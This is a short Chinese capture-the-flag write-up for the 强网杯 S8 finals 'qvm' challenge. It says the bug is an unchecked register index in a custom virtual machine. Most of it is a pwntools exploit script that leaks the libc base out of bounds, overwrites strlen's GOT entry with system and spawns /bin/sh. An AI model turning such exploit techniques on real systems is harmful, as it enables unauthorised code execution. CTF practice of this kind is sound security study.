强网杯S8决赛qvm
本来想分析一下的,但这个题主要难度在于逆向,漏洞点也是在于对寄存器idx检查问题,导致可以越界,最后打通
逆向的过程也是赛博算卦,硬猜硬试打通的
from pwnlib.util.packing import u64
from pwnlib.util.packing import u32
from pwnlib.util.packing import u16
from pwnlib.util.packing import u8
from pwnlib.util.packing import p64
from pwnlib.util.packing import p32
from pwnlib.util.packing import p16
from pwnlib.util.packing import p8
from pwn import *
from ctypes import *
context(os='linux', arch='amd64', log_level='debug')
p = process("/home/zp9080/PWN/pwn")
# p=gdb.debug("/home/zp9080/PWN/pwn",'b *$rebase(0x1A8F7)')
# p=remote('192.168.18.26',8883)
# p=process(['seccomp-tools','dump','/home/zp9080/PWN/pwn'])
elf = ELF("/home/zp9080/PWN/pwn")
libc=elf.libc
def dbg():
gdb.attach(p,'b *$rebase(0xFBE1)')
pause()
#mov传参要是10进制
#谁在右边传值给谁
#strlen 1139208
def off2s(value,reg):
string=''
off=format(value, '032b')
for i in range(len(off)):
if(i==(len(off)-1)):
if(off[i]=='0'):
pass
elif(off[i]=='1'):
string+=f'inc {reg}\n'
break
if(off[i]=='0'):
string+=f'mul 2 {reg}\n'
elif(off[i]=='1'):
string+=f'inc {reg}\nmul 2 {reg}\n'
return string
code='''
data 1 "/bin/sh\x00"
_start:
mov 1139208 0
inc 2
inc 2
'''
code+=off2s(0xA86A0+0x109a00,1)
#得到libcbase
tmp='sub 1 0\n'
code+=tmp
#得到ogg
system=0x50900
code+=off2s(system,3)
tmp='add 3 0\n'
code+=tmp
#写strlen_got
tmp='mov 0 1139208\n'
code+=tmp
tmp='ods 1\n'
code+=tmp
code+='EOF'
# dbg()
p.sendlineafter(b'Code :',code)
p.interactive()